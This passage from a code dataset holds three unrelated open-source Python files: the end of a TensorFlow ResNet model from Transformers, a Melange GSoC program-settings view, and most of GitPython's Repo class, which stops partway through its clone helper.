TFResNetShortCut(out_channels, stride=stride, name="shortcut")
if should_apply_shortcut
else tf.keras.layers.Activation("linear", name="shortcut")
)
self.activation = ACT2FN[activation]
def call(self, hidden_state: tf.Tensor, training: bool = False) -> tf.Tensor:
residual = hidden_state
hidden_state = self.conv1(hidden_state, training=training)
hidden_state = self.conv2(hidden_state, training=training)
residual = self.shortcut(residual, training=training)
hidden_state += residual
hidden_state = self.activation(hidden_state)
return hidden_state
class TFResNetBottleNeckLayer(tf.keras.layers.Layer):
"""
A classic ResNet's bottleneck layer composed by three `3x3` convolutions.
The first `1x1` convolution reduces the input by a factor of `reduction` in order to make the second `3x3`
convolution faster. The last `1x1` convolution remaps the reduced features to `out_channels`.
"""
def __init__(
self,
in_channels: int,
out_channels: int,
stride: int = 1,
activation: str = "relu",
reduction: int = 4,
**kwargs
) -> None:
super().__init__(**kwargs)
should_apply_shortcut = in_channels != out_channels or stride != 1
reduces_channels = out_channels // reduction
self.conv0 = TFResNetConvLayer(reduces_channels, kernel_size=1, name="layer.0")
self.conv1 = TFResNetConvLayer(reduces_channels, stride=stride, name="layer.1")
self.conv2 = TFResNetConvLayer(out_channels, kernel_size=1, activation=None, name="layer.2")
self.shortcut = (
TFResNetShortCut(out_channels, stride=stride, name="shortcut")
if should_apply_shortcut
else tf.keras.layers.Activation("linear", name="shortcut")
)
self.activation = ACT2FN[activation]
def call(self, hidden_state: tf.Tensor, training: bool = False) -> tf.Tensor:
residual = hidden_state
hidden_state = self.conv0(hidden_state, training=training)
hidden_state = self.conv1(hidden_state, training=training)
hidden_state = self.conv2(hidden_state, training=training)
residual = self.shortcut(residual, training=training)
hidden_state += residual
hidden_state = self.activation(hidden_state)
return hidden_state
class TFResNetStage(tf.keras.layers.Layer):
"""
A ResNet stage composed of stacked layers.
"""
def __init__(
self, config: ResNetConfig, in_channels: int, out_channels: int, stride: int = 2, depth: int = 2, **kwargs
) -> None:
super().__init__(**kwargs)
layer = TFResNetBottleNeckLayer if config.layer_type == "bottleneck" else TFResNetBasicLayer
layers = [layer(in_channels, out_channels, stride=stride, activation=config.hidden_act, name="layers.0")]
layers += [
layer(out_channels, out_channels, activation=config.hidden_act, name=f"layers.{i + 1}")
for i in range(depth - 1)
]
self.stage_layers = layers
def call(self, hidden_state: tf.Tensor, training: bool = False) -> tf.Tensor:
for layer in self.stage_layers:
hidden_state = layer(hidden_state, training=training)
return hidden_state
class TFResNetEncoder(tf.keras.layers.Layer):
def __init__(self, config: ResNetConfig, **kwargs) -> None:
super().__init__(**kwargs)
# based on `downsample_in_first_stage` the first layer of the first stage may or may not downsample the input
self.stages = [
TFResNetStage(
config,
config.embedding_size,
config.hidden_sizes[0],
stride=2 if config.downsample_in_first_stage else 1,
depth=config.depths[0],
name="stages.0",
)
]
for i, (in_channels, out_channels, depth) in enumerate(
zip(config.hidden_sizes, config.hidden_sizes[1:], config.depths[1:])
):
self.stages.append(TFResNetStage(config, in_channels, out_channels, depth=depth, name=f"stages.{i + 1}"))
def call(
self,
hidden_state: tf.Tensor,
output_hidden_states: bool = False,
return_dict: bool = True,
training: bool = False,
) -> TFBaseModelOutputWithNoAttention:
hidden_states = () if output_hidden_states else None
for stage_module in self.stages:
if output_hidden_states:
hidden_states = hidden_states + (hidden_state,)
hidden_state = stage_module(hidden_state, training=training)
if output_hidden_states:
hidden_states = hidden_states + (hidden_state,)
if not return_dict:
return tuple(v for v in [hidden_state, hidden_states] if v is not None)
return TFBaseModelOutputWithNoAttention(last_hidden_state=hidden_state, hidden_states=hidden_states)
class TFResNetPreTrainedModel(TFPreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = ResNetConfig
base_model_prefix = "resnet"
main_input_name = "pixel_values"
@property
def dummy_inputs(self) -> Dict[str, tf.Tensor]:
"""
Dummy inputs to build the network. Returns:
`Dict[str, tf.Tensor]`: The dummy inputs.
"""
VISION_DUMMY_INPUTS = tf.random.uniform(shape=(3, self.config.num_channels, 224, 224), dtype=tf.float32)
return {"pixel_values": tf.constant(VISION_DUMMY_INPUTS)}
@tf.function(
input_signature=[
{
"pixel_values": tf.TensorSpec((None, None, None, None), tf.float32, name="pixel_values"),
}
]
)
def serving(self, inputs):
output = self.call(inputs)
return self.serving_output(output)
RESNET_START_DOCSTRING = r"""
This model is a TensorFlow
[tf.keras.layers.Layer](https://www.tensorflow.org/api_docs/python/tf/keras/layers/Layer) sub-class. Use it as a
regular TensorFlow Module and refer to the TensorFlow documentation for all matter related to general usage and
behavior.
Parameters:
config ([`ResNetConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~TFPreTrainedModel.from_pretrained`] method to load the model weights.
"""
RESNET_INPUTS_DOCSTRING = r"""
Args:
pixel_values (`tf.Tensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoFeatureExtractor`]. See
[`AutoFeatureExtractor.__call__`] for details.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@keras_serializable
class TFResNetMainLayer(tf.keras.layers.Layer):
config_class = ResNetConfig
def __init__(self, config: ResNetConfig, **kwargs) -> None:
super().__init__(**kwargs)
self.config = config
self.embedder = TFResNetEmbeddings(config, name="embedder")
self.encoder = TFResNetEncoder(config, name="encoder")
self.pooler = tf.keras.layers.GlobalAveragePooling2D(keepdims=True)
@unpack_inputs
def call(
self,
pixel_values: tf.Tensor,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: bool = False,
) -> Union[Tuple[tf.Tensor], TFBaseModelOutputWithPoolingAndNoAttention]:
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
# TF 2.0 image layers can't use NCHW format when running on CPU.
# We transpose to NHWC format and then transpose back after the full forward pass.
# (batch_size, num_channels, height, width) -> (batch_size, height, width, num_channels)
pixel_values = tf.transpose(pixel_values, perm=[0, 2, 3, 1])
embedding_output = self.embedder(pixel_values, training=training)
encoder_outputs = self.encoder(
embedding_output, output_hidden_states=output_hidden_states, return_dict=return_dict, training=training
)
last_hidden_state = encoder_outputs[0]
pooled_output = self.pooler(last_hidden_state)
# Transpose all the outputs to the NCHW format
# (batch_size, height, width, num_channels) -> (batch_size, num_channels, height, width)
last_hidden_state = tf.transpose(last_hidden_state, (0, 3, 1, 2))
pooled_output = tf.transpose(pooled_output, (0, 3, 1, 2))
hidden_states = ()
for hidden_state in encoder_outputs[1:]:
hidden_states = hidden_states + tuple(tf.transpose(h, (0, 3, 1, 2)) for h in hidden_state)
if not return_dict:
return (last_hidden_state, pooled_output) + hidden_states
hidden_states = hidden_states if output_hidden_states else None
return TFBaseModelOutputWithPoolingAndNoAttention(
last_hidden_state=last_hidden_state,
pooler_output=pooled_output,
hidden_states=hidden_states,
)
@add_start_docstrings(
"The bare ResNet model outputting raw features without any specific head on top.",
RESNET_START_DOCSTRING,
)
class TFResNetModel(TFResNetPreTrainedModel):
def __init__(self, config: ResNetConfig, **kwargs) -> None:
super().__init__(config, **kwargs)
self.resnet = TFResNetMainLayer(config=config, name="resnet")
@add_start_docstrings_to_model_forward(RESNET_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
processor_class=_FEAT_EXTRACTOR_FOR_DOC,
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=TFBaseModelOutputWithPoolingAndNoAttention,
config_class=_CONFIG_FOR_DOC,
modality="vision",
expected_output=_EXPECTED_OUTPUT_SHAPE,
)
@unpack_inputs
def call(
self,
pixel_values: tf.Tensor,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: bool = False,
) -> Union[Tuple[tf.Tensor], TFBaseModelOutputWithPoolingAndNoAttention]:
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
resnet_outputs = self.resnet(
pixel_values=pixel_values,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
return resnet_outputs
def serving_output(
self, output: TFBaseModelOutputWithPoolingAndNoAttention
) -> TFBaseModelOutputWithPoolingAndNoAttention:
# hidden_states not converted to Tensor with tf.convert_to_tensor as they are all of different dimensions
return TFBaseModelOutputWithPoolingAndNoAttention(
last_hidden_state=output.last_hidden_state,
pooler_output=output.pooler_output,
hidden_states=output.hidden_states,
)
@add_start_docstrings(
"""
ResNet Model with an image classification head on top (a linear layer on top of the pooled features), e.g. for
ImageNet.
""",
RESNET_START_DOCSTRING,
)
class TFResNetForImageClassification(TFResNetPreTrainedModel, TFSequenceClassificationLoss):
def __init__(self, config: ResNetConfig, **kwargs) -> None:
super().__init__(config, **kwargs)
self.num_labels = config.num_labels
self.resnet = TFResNetMainLayer(config, name="resnet")
# classification head
self.classifier_layer = (
tf.keras.layers.Dense(config.num_labels, name="classifier.1")
if config.num_labels > 0
else tf.keras.layers.Activation("linear", name="classifier.1")
)
def classifier(self, x: tf.Tensor) -> tf.Tensor:
x = tf.keras.layers.Flatten()(x)
logits = self.classifier_layer(x)
return logits
@add_start_docstrings_to_model_forward(RESNET_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
processor_class=_FEAT_EXTRACTOR_FOR_DOC,
checkpoint=_IMAGE_CLASS_CHECKPOINT,
output_type=TFImageClassifierOutputWithNoAttention,
config_class=_CONFIG_FOR_DOC,
expected_output=_IMAGE_CLASS_EXPECTED_OUTPUT,
)
@unpack_inputs
def call(
self,
pixel_values: tf.Tensor = None,
labels: tf.Tensor = None,
output_hidden_states: bool = None,
return_dict: bool = None,
training: bool = False,
) -> Union[Tuple[tf.Tensor], TFImageClassifierOutputWithNoAttention]:
r"""
labels (`tf.Tensor` of shape `(batch_size,)`, *optional*):
Labels for computing the image classification/regression loss. Indices should be in `[0, ...,
config.num_labels - 1]`. If `config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.resnet(
pixel_values, output_hidden_states=output_hidden_states, return_dict=return_dict, training=training
)
pooled_output = outputs.pooler_output if return_dict else outputs[1]
logits = self.classifier(pooled_output)
loss = None if labels is None else self.hf_compute_loss(labels, logits)
if not return_dict:
output = (logits,) + outputs[2:]
return (loss,) + output if loss is not None else output
return TFImageClassifierOutputWithNoAttention(loss=loss, logits=logits, hidden_states=outputs.hidden_states)
def serving_output(self, output: TFImageClassifierOutputWithNoAttention) -> TFImageClassifierOutputWithNoAttention:
# hidden_states not converted to Tensor with tf.convert_to_tensor as they are all of different dimensions
return TFImageClassifierOutputWithNoAttention(logits=output.logits, hidden_states=output.hidden_states)
| {
"content_hash": "6b53df25f36c403e7ccc7734cfaaf8d5",
"timestamp": "",
"source": "github",
"line_count": 487,
"max_line_length": 119,
"avg_line_length": 40.98973305954826,
"alnum_prop": 0.6520388738603347,
"repo_name": "huggingface/transformers",
"id": "4cf0d21ec777dbd0355f52ac808112b03ed15f5e",
"size": "20617",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "src/transformers/models/resnet/modeling_tf_resnet.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "6021"
},
{
"name": "C++",
"bytes": "12959"
},
{
"name": "Cuda",
"bytes": "175419"
},
{
"name": "Dockerfile",
"bytes": "18218"
},
{
"name": "Jsonnet",
"bytes": "937"
},
{
"name": "Makefile",
"bytes": "3430"
},
{
"name": "Python",
"bytes": "35742012"
},
{
"name": "Shell",
"bytes": "30374"
}
],
"symlink_target": ""
} |
"""Module for the program settings pages.
"""
__authors__ = [
'"Sverre Rabbelier" <sverre@rabbelier.nl>',
]
from django.conf.urls.defaults import url
from django.core.urlresolvers import reverse
from soc.logic.models.document import logic as document_logic
from soc.views.forms import ModelForm
from soc.modules.gsoc.models.program import GSoCProgram
from soc.modules.gsoc.views.base import RequestHandler
from soc.modules.gsoc.views.helper import url_patterns
class ProgramForm(ModelForm):
"""Django form for the program settings.
"""
def __init__(self, scope_path, *args, **kwargs):
self.scope_path = scope_path
super(ProgramForm, self).__init__(*args, **kwargs)
class Meta:
css_prefix = 'program_form'
model = GSoCProgram
exclude = ['link_id', 'scope', 'scope_path', 'timeline',
'home', 'slots_allocation']
class ProgramPage(RequestHandler):
"""View for the participant profile.
"""
def djangoURLPatterns(self):
return [
url(r'^gsoc/program/edit/%s$' % url_patterns.PROGRAM, self,
name='edit_gsoc_program'),
]
def jsonContext(self):
entities = document_logic.getForFields({
'prefix': 'gsoc_program',
'scope': self.data.program.key()
})
data = [{'key': str(i.key()),
'key_name': i.key().name(),
'label': i.title}
for i in entities]
return {'data': data}
def checkAccess(self):
self.check.isHost()
def templatePath(self):
return 'v2/modules/gsoc/program/base.html'
def context(self):
scope_path = self.data.program.key().id_or_name()
program_form = ProgramForm(scope_path, self.data.POST or None,
instance=self.data.program)
return {
'page_name': 'Edit program settings',
'forms': [program_form],
'error': program_form.errors,
}
def validate(self):
scope_path = self.data.program.key().id_or_name()
program_form = ProgramForm(scope_path, self.data.POST,
instance=self.data.program)
if not program_form.is_valid():
return False
program_form.save()
def post(self):
"""Handler for HTTP POST request.
"""
if self.validate():
self.redirect.program()
self.redirect.to('edit_program_settings')
else:
self.get()
| {
"content_hash": "a3cce4e15b2c13f411d84720ca994dc8",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 67,
"avg_line_length": 25.86813186813187,
"alnum_prop": 0.6265930331350892,
"repo_name": "SRabbelier/Melange",
"id": "9badef269509b44198c669ad3ce4bb9fd26c98a6",
"size": "2964",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/soc/modules/gsoc/views/program.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "400472"
},
{
"name": "C++",
"bytes": "20"
},
{
"name": "Java",
"bytes": "1496"
},
{
"name": "JavaScript",
"bytes": "1623582"
},
{
"name": "PHP",
"bytes": "1032"
},
{
"name": "Perl",
"bytes": "177565"
},
{
"name": "Python",
"bytes": "15317793"
},
{
"name": "Ruby",
"bytes": "59"
},
{
"name": "Shell",
"bytes": "15303"
}
],
"symlink_target": ""
} |
from git.exc import InvalidGitRepositoryError, NoSuchPathError
from git.cmd import Git
from git.util import Actor
from git.refs import *
from git.index import IndexFile
from git.objects import *
from git.config import GitConfigParser
from git.remote import (
Remote,
digest_process_messages,
finalize_process,
add_progress
)
from git.db import (
GitCmdObjectDB,
GitDB
)
from gitdb.util import (
join,
isfile,
hex_to_bin
)
from fun import (
rev_parse,
is_git_dir,
touch
)
import os
import sys
import re
DefaultDBType = GitDB
if sys.version_info[1] < 5: # python 2.4 compatiblity
DefaultDBType = GitCmdObjectDB
# END handle python 2.4
__all__ = ('Repo', )
class Repo(object):
"""Represents a git repository and allows you to query references,
gather commit information, generate diffs, create and clone repositories query
the log.
The following attributes are worth using:
'working_dir' is the working directory of the git command, wich is the working tree
directory if available or the .git directory in case of bare repositories
'working_tree_dir' is the working tree directory, but will raise AssertionError
if we are a bare repository.
'git_dir' is the .git repository directoy, which is always set."""
DAEMON_EXPORT_FILE = 'git-daemon-export-ok'
__slots__ = ( "working_dir", "_working_tree_dir", "git_dir", "_bare", "git", "odb" )
# precompiled regex
re_whitespace = re.compile(r'\s+')
re_hexsha_only = re.compile('^[0-9A-Fa-f]{40}$')
re_hexsha_shortened = re.compile('^[0-9A-Fa-f]{4,40}$')
re_author_committer_start = re.compile(r'^(author|committer)')
re_tab_full_line = re.compile(r'^\t(.*)$')
# invariants
# represents the configuration level of a configuration file
config_level = ("system", "global", "repository")
def __init__(self, path=None, odbt = DefaultDBType):
"""Create a new Repo instance
:param path: is the path to either the root git directory or the bare git repo::
repo = Repo("/Users/mtrier/Development/git-python")
repo = Repo("/Users/mtrier/Development/git-python.git")
repo = Repo("~/Development/git-python.git")
repo = Repo("$REPOSITORIES/Development/git-python.git")
:param odbt: Object DataBase type - a type which is constructed by providing
the directory containing the database objects, i.e. .git/objects. It will
be used to access all object data
:raise InvalidGitRepositoryError:
:raise NoSuchPathError:
:return: git.Repo """
epath = os.path.abspath(os.path.expandvars(os.path.expanduser(path or os.getcwd())))
if not os.path.exists(epath):
raise NoSuchPathError(epath)
self.working_dir = None
self._working_tree_dir = None
self.git_dir = None
curpath = epath
# walk up the path to find the .git dir
while curpath:
if is_git_dir(curpath):
self.git_dir = curpath
self._working_tree_dir = os.path.dirname(curpath)
break
gitpath = join(curpath, '.git')
if is_git_dir(gitpath):
self.git_dir = gitpath
self._working_tree_dir = curpath
break
curpath, dummy = os.path.split(curpath)
if not dummy:
break
# END while curpath
if self.git_dir is None:
raise InvalidGitRepositoryError(epath)
self._bare = False
try:
self._bare = self.config_reader("repository").getboolean('core','bare')
except Exception:
# lets not assume the option exists, although it should
pass
# adjust the wd in case we are actually bare - we didn't know that
# in the first place
if self._bare:
self._working_tree_dir = None
# END working dir handling
self.working_dir = self._working_tree_dir or self.git_dir
self.git = Git(self.working_dir)
# special handling, in special times
args = [join(self.git_dir, 'objects')]
if issubclass(odbt, GitCmdObjectDB):
args.append(self.git)
self.odb = odbt(*args)
def __eq__(self, rhs):
if isinstance(rhs, Repo):
return self.git_dir == rhs.git_dir
return False
def __ne__(self, rhs):
return not self.__eq__(rhs)
def __hash__(self):
return hash(self.git_dir)
def __repr__(self):
return "%s(%r)" % (type(self).__name__, self.git_dir)
# Description property
def _get_description(self):
filename = join(self.git_dir, 'description')
return file(filename).read().rstrip()
def _set_description(self, descr):
filename = join(self.git_dir, 'description')
file(filename, 'w').write(descr+'\n')
description = property(_get_description, _set_description,
doc="the project's description")
del _get_description
del _set_description
@property
def working_tree_dir(self):
""":return: The working tree directory of our git repository
:raise AssertionError: If we are a bare repository"""
if self._working_tree_dir is None:
raise AssertionError( "Repository at %r is bare and does not have a working tree directory" % self.git_dir )
return self._working_tree_dir
@property
def bare(self):
""":return: True if the repository is bare"""
return self._bare
@property
def heads(self):
"""A list of ``Head`` objects representing the branch heads in
this repo
:return: ``git.IterableList(Head, ...)``"""
return Head.list_items(self)
@property
def references(self):
"""A list of Reference objects representing tags, heads and remote references.
:return: IterableList(Reference, ...)"""
return Reference.list_items(self)
# alias for references
refs = references
# alias for heads
branches = heads
@property
def index(self):
""":return: IndexFile representing this repository's index."""
return IndexFile(self)
@property
def head(self):
""":return: HEAD Object pointing to the current head reference"""
return HEAD(self,'HEAD')
@property
def remotes(self):
"""A list of Remote objects allowing to access and manipulate remotes
:return: ``git.IterableList(Remote, ...)``"""
return Remote.list_items(self)
def remote(self, name='origin'):
""":return: Remote with the specified name
:raise ValueError: if no remote with such a name exists"""
return Remote(self, name)
#{ Submodules
@property
def submodules(self):
"""
:return: git.IterableList(Submodule, ...) of direct submodules
available from the current head"""
return Submodule.list_items(self)
def submodule(self, name):
""" :return: Submodule with the given name
:raise ValueError: If no such submodule exists"""
try:
return self.submodules[name]
except IndexError:
raise ValueError("Didn't find submodule named %r" % name)
# END exception handling
def create_submodule(self, *args, **kwargs):
"""Create a new submodule
:note: See the documentation of Submodule.add for a description of the
applicable parameters
:return: created submodules"""
return Submodule.add(self, *args, **kwargs)
def iter_submodules(self, *args, **kwargs):
"""An iterator yielding Submodule instances, see Traversable interface
for a description of args and kwargs
:return: Iterator"""
return RootModule(self).traverse(*args, **kwargs)
def submodule_update(self, *args, **kwargs):
"""Update the submodules, keeping the repository consistent as it will
take the previous state into consideration. For more information, please
see the documentation of RootModule.update"""
return RootModule(self).update(*args, **kwargs)
#}END submodules
@property
def tags(self):
"""A list of ``Tag`` objects that are available in this repo
:return: ``git.IterableList(TagReference, ...)`` """
return TagReference.list_items(self)
def tag(self,path):
""":return: TagReference Object, reference pointing to a Commit or Tag
:param path: path to the tag reference, i.e. 0.1.5 or tags/0.1.5 """
return TagReference(self, path)
def create_head(self, path, commit='HEAD', force=False, logmsg=None ):
"""Create a new head within the repository.
For more documentation, please see the Head.create method.
:return: newly created Head Reference"""
return Head.create(self, path, commit, force, logmsg)
def delete_head(self, *heads, **kwargs):
"""Delete the given heads
:param kwargs: Additional keyword arguments to be passed to git-branch"""
return Head.delete(self, *heads, **kwargs)
def create_tag(self, path, ref='HEAD', message=None, force=False, **kwargs):
"""Create a new tag reference.
For more documentation, please see the TagReference.create method.
:return: TagReference object """
return TagReference.create(self, path, ref, message, force, **kwargs)
def delete_tag(self, *tags):
"""Delete the given tag references"""
return TagReference.delete(self, *tags)
def create_remote(self, name, url, **kwargs):
"""Create a new remote.
For more information, please see the documentation of the Remote.create
methods
:return: Remote reference"""
return Remote.create(self, name, url, **kwargs)
def delete_remote(self, remote):
"""Delete the given remote."""
return Remote.remove(self, remote)
def _get_config_path(self, config_level ):
# we do not support an absolute path of the gitconfig on windows ,
# use the global config instead
if sys.platform == "win32" and config_level == "system":
config_level = "global"
if config_level == "system":
return "/etc/gitconfig"
elif config_level == "global":
return os.path.normpath(os.path.expanduser("~/.gitconfig"))
elif config_level == "repository":
return join(self.git_dir, "config")
raise ValueError( "Invalid configuration level: %r" % config_level )
def config_reader(self, config_level=None):
"""
:return:
GitConfigParser allowing to read the full git configuration, but not to write it
The configuration will include values from the system, user and repository
configuration files.
:param config_level:
For possible values, see config_writer method
If None, all applicable levels will be used. Specify a level in case
you know which exact file you whish to read to prevent reading multiple files for
instance
:note: On windows, system configuration cannot currently be read as the path is
unknown, instead the global path will be used."""
files = None
if config_level is None:
files = [ self._get_config_path(f) for f in self.config_level ]
else:
files = [ self._get_config_path(config_level) ]
return GitConfigParser(files, read_only=True)
def config_writer(self, config_level="repository"):
"""
:return:
GitConfigParser allowing to write values of the specified configuration file level.
Config writers should be retrieved, used to change the configuration ,and written
right away as they will lock the configuration file in question and prevent other's
to write it.
:param config_level:
One of the following values
system = sytem wide configuration file
global = user level configuration file
repository = configuration file for this repostory only"""
return GitConfigParser(self._get_config_path(config_level), read_only = False)
def commit(self, rev=None):
"""The Commit object for the specified revision
:param rev: revision specifier, see git-rev-parse for viable options.
:return: ``git.Commit``"""
if rev is None:
return self.head.commit
else:
return self.rev_parse(str(rev)+"^0")
def iter_trees(self, *args, **kwargs):
""":return: Iterator yielding Tree objects
:note: Takes all arguments known to iter_commits method"""
return ( c.tree for c in self.iter_commits(*args, **kwargs) )
def tree(self, rev=None):
"""The Tree object for the given treeish revision
Examples::
repo.tree(repo.heads[0])
:param rev: is a revision pointing to a Treeish ( being a commit or tree )
:return: ``git.Tree``
:note:
If you need a non-root level tree, find it by iterating the root tree. Otherwise
it cannot know about its path relative to the repository root and subsequent
operations might have unexpected results."""
if rev is None:
return self.head.commit.tree
else:
return self.rev_parse(str(rev)+"^{tree}")
def iter_commits(self, rev=None, paths='', **kwargs):
"""A list of Commit objects representing the history of a given ref/commit
:parm rev:
revision specifier, see git-rev-parse for viable options.
If None, the active branch will be used.
:parm paths:
is an optional path or a list of paths to limit the returned commits to
Commits that do not contain that path or the paths will not be returned.
:parm kwargs:
Arguments to be passed to git-rev-list - common ones are
max_count and skip
:note: to receive only commits between two named revisions, use the
"revA..revB" revision specifier
:return ``git.Commit[]``"""
if rev is None:
rev = self.head.commit
return Commit.iter_items(self, rev, paths, **kwargs)
def _get_daemon_export(self):
filename = join(self.git_dir, self.DAEMON_EXPORT_FILE)
return os.path.exists(filename)
def _set_daemon_export(self, value):
filename = join(self.git_dir, self.DAEMON_EXPORT_FILE)
fileexists = os.path.exists(filename)
if value and not fileexists:
touch(filename)
elif not value and fileexists:
os.unlink(filename)
daemon_export = property(_get_daemon_export, _set_daemon_export,
doc="If True, git-daemon may export this repository")
del _get_daemon_export
del _set_daemon_export
def _get_alternates(self):
"""The list of alternates for this repo from which objects can be retrieved
:return: list of strings being pathnames of alternates"""
alternates_path = join(self.git_dir, 'objects', 'info', 'alternates')
if os.path.exists(alternates_path):
try:
f = open(alternates_path)
alts = f.read()
finally:
f.close()
return alts.strip().splitlines()
else:
return list()
def _set_alternates(self, alts):
"""Sets the alternates
:parm alts:
is the array of string paths representing the alternates at which
git should look for objects, i.e. /home/user/repo/.git/objects
:raise NoSuchPathError:
:note:
The method does not check for the existance of the paths in alts
as the caller is responsible."""
alternates_path = join(self.git_dir, 'objects', 'info', 'alternates')
if not alts:
if isfile(alternates_path):
os.remove(alternates_path)
else:
try:
f = open(alternates_path, 'w')
f.write("\n".join(alts))
finally:
f.close()
# END file handling
# END alts handling
alternates = property(_get_alternates, _set_alternates, doc="Retrieve a list of alternates paths or set a list paths to be used as alternates")
def is_dirty(self, index=True, working_tree=True, untracked_files=False):
"""
:return:
``True``, the repository is considered dirty. By default it will react
like a git-status without untracked files, hence it is dirty if the
index or the working copy have changes."""
if self._bare:
# Bare repositories with no associated working directory are
# always consired to be clean.
return False
# start from the one which is fastest to evaluate
default_args = ('--abbrev=40', '--full-index', '--raw')
if index:
# diff index against HEAD
if isfile(self.index.path) and self.head.is_valid() and \
len(self.git.diff('HEAD', '--cached', *default_args)):
return True
# END index handling
if working_tree:
# diff index against working tree
if len(self.git.diff(*default_args)):
return True
# END working tree handling
if untracked_files:
if len(self.untracked_files):
return True
# END untracked files
return False
@property
def untracked_files(self):
"""
:return:
list(str,...)
Files currently untracked as they have not been staged yet. Paths
are relative to the current working directory of the git command.
:note:
ignored files will not appear here, i.e. files mentioned in .gitignore"""
# make sure we get all files, no only untracked directores
proc = self.git.status(untracked_files=True, as_process=True)
stream = iter(proc.stdout)
untracked_files = list()
for line in stream:
if not line.startswith("# Untracked files:"):
continue
# skip two lines
stream.next()
stream.next()
for untracked_info in stream:
if not untracked_info.startswith("#\t"):
break
untracked_files.append(untracked_info.replace("#\t", "").rstrip())
# END for each utracked info line
# END for each line
return untracked_files
@property
def active_branch(self):
"""The name of the currently active branch.
:return: Head to the active branch"""
return self.head.reference
def blame(self, rev, file):
"""The blame information for the given file at the given revision.
:parm rev: revision specifier, see git-rev-parse for viable options.
:return:
list: [git.Commit, list: [<line>]]
A list of tuples associating a Commit object with a list of lines that
changed within the given commit. The Commit objects will be given in order
of appearance."""
data = self.git.blame(rev, '--', file, p=True)
commits = dict()
blames = list()
info = None
for line in data.splitlines(False):
parts = self.re_whitespace.split(line, 1)
firstpart = parts[0]
if self.re_hexsha_only.search(firstpart):
# handles
# 634396b2f541a9f2d58b00be1a07f0c358b999b3 1 1 7 - indicates blame-data start
# 634396b2f541a9f2d58b00be1a07f0c358b999b3 2 2 - indicates another line of blame with the same data
digits = parts[-1].split(" ")
if len(digits) == 3:
info = {'id': firstpart}
blames.append([None, []])
elif info['id'] != firstpart:
info = {'id': firstpart}
blames.append([commits.get(firstpart), []])
# END blame data initialization
else:
m = self.re_author_committer_start.search(firstpart)
if m:
# handles:
# author Tom Preston-Werner
# author-mail <tom@mojombo.com>
# author-time 1192271832
# author-tz -0700
# committer Tom Preston-Werner
# committer-mail <tom@mojombo.com>
# committer-time 1192271832
# committer-tz -0700 - IGNORED BY US
role = m.group(0)
if firstpart.endswith('-mail'):
info["%s_email" % role] = parts[-1]
elif firstpart.endswith('-time'):
info["%s_date" % role] = int(parts[-1])
elif role == firstpart:
info[role] = parts[-1]
# END distinguish mail,time,name
else:
# handle
# filename lib/grit.rb
# summary add Blob
# <and rest>
if firstpart.startswith('filename'):
info['filename'] = parts[-1]
elif firstpart.startswith('summary'):
info['summary'] = parts[-1]
elif firstpart == '':
if info:
sha = info['id']
c = commits.get(sha)
if c is None:
c = Commit( self, hex_to_bin(sha),
author=Actor._from_string(info['author'] + ' ' + info['author_email']),
authored_date=info['author_date'],
committer=Actor._from_string(info['committer'] + ' ' + info['committer_email']),
committed_date=info['committer_date'],
message=info['summary'])
commits[sha] = c
# END if commit objects needs initial creation
m = self.re_tab_full_line.search(line)
text, = m.groups()
blames[-1][0] = c
info = {'id': sha}
# END if we collected commit info
blames[-1][1].append( text )
# END distinguish filename,summary,rest
# END distinguish author|committer vs filename,summary,rest
# END distinguish hexsha vs other information
return blames
@classmethod
def init(cls, path=None, mkdir=True, **kwargs):
"""Initialize a git repository at the given path if specified
:param path:
is the full path to the repo (traditionally ends with /<name>.git)
or None in which case the repository will be created in the current
working directory
:parm mkdir:
if specified will create the repository directory if it doesn't
already exists. Creates the directory with a mode=0755.
Only effective if a path is explicitly given
:parm kwargs:
keyword arguments serving as additional options to the git-init command
:return: ``git.Repo`` (the newly created repo)"""
if mkdir and path and not os.path.exists(path):
os.makedirs(path, 0755)
# git command automatically chdir into the directory
git = Git(path)
output = git.init(**kwargs)
return Repo(path)
@classmethod
def _clone(cls, git, url, path, odb_default_type, progress, **kwargs):
# special handling for windows for path at which the clone should be
# created.
# tilde '~' will be expanded to the HOME no matter where the ~ occours. Hence
# we at least give a proper error instead of letting git fail
prev_cwd = None
prev_path = None
odbt = kwargs.pop('odbt', odb_default_type)
if os.name == 'nt':
if '~' in path:
raise OSError("Git cannot handle the ~ character in path %r correctly" % path)
# on windows, git will think paths like c: are relative and prepend the
# current working dir ( before it fails ). We temporarily adjust the working
# dir to make this actually work
match = re.match("(\w:[/\\\])(.*)", path)
if match:
prev_cwd = os.getcwd()
prev_path = path
drive, rest_of_path = match.groups()
os.chdir(drive)
path = rest_of_path
kwargs['with_keep_cwd'] = True
# END cwd preparation
# END windows handling
try:
proc = git.clone(url, path, with_extended_output=True, as_process=True, v=True, **add_progress(kwargs, git, progress))
if progress:
digest_process_messages(proc.stderr, progress)
#END handle progress
finalize_process(proc)
finally:
if prev_cwd is not None:
os.chdir(prev_cwd)
path = prev_path
# END reset previous working dir
# END bad windows handling
